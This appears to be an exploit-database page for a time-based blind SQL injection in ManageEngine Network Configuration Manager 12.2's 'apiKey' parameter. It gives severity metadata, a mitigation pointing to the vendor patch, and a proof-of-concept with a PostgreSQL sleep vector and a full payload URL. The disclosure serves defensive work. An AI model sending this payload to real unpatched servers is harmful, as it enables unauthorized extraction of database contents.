header-logo
Suggest Exploit
vendor:
Network Configuration Manager
by:
AmirHadi Yazdani
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Network Configuration Manager
Affected Version From: <= Build Version : 12.2
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: a:manageengine:network_configuration_manager:12.2
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 2012 R2
2019

ManageEngine Network Configuration Manager 12.2 – ‘apiKey’ SQL Injection

ManageEngine Network Configuration Manager (NCM) is vulnerable to a time-based blind SQL injection vulnerability. This vulnerability exists in the 'apiKey' parameter of the 'getOverviewList' API endpoint. An attacker can send a specially crafted HTTP request with a malicious payload to the vulnerable API endpoint, which can be used to extract information from the database.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of ManageEngine Network Configuration Manager.
Source

Exploit-DB raw data:

# Exploit Title: ManageEngine Network Configuration Manager 12.2 - 'apiKey' SQL Injection
# discovery Date: 2019-01-24
# published : 2020-01-20
# Exploit Author: AmirHadi Yazdani
# Vendor Homepage: https://www.manageengine.com/network-configuration-manager/
# Software Link: https://www.manageengine.com/network-configuration-manager/
# Demo: http://demo.networkconfigurationmanager.com
# Version: <= Build Version  : 12.2
# Tested on: win 2012 R2
------------
About ManageEngine Network Configuration Manager(NCM) (From Vendor Site) :     
                                
Network Configuration Manager is a multi vendor network change,
configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices.
NCM helps automate and take total control of the entire life cycle of device configuration management.
--------------------------------------------------------

Exploit POC :

# Parameter: apiKey (GET)
# Title: PostgreSQL Time Based Blind
# Vector: AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))

#Payload:  
http://127.0.0.1/api/json/dashboard/getOverviewList?apiKey=1 AND 1398=(SELECT COUNT(*) FROM GENERATE_SERIES(1,3000000))&TimeFrame=hourly&_=1483732552930

--------------------------

Navigation

Suggest Exploit

Services By CQR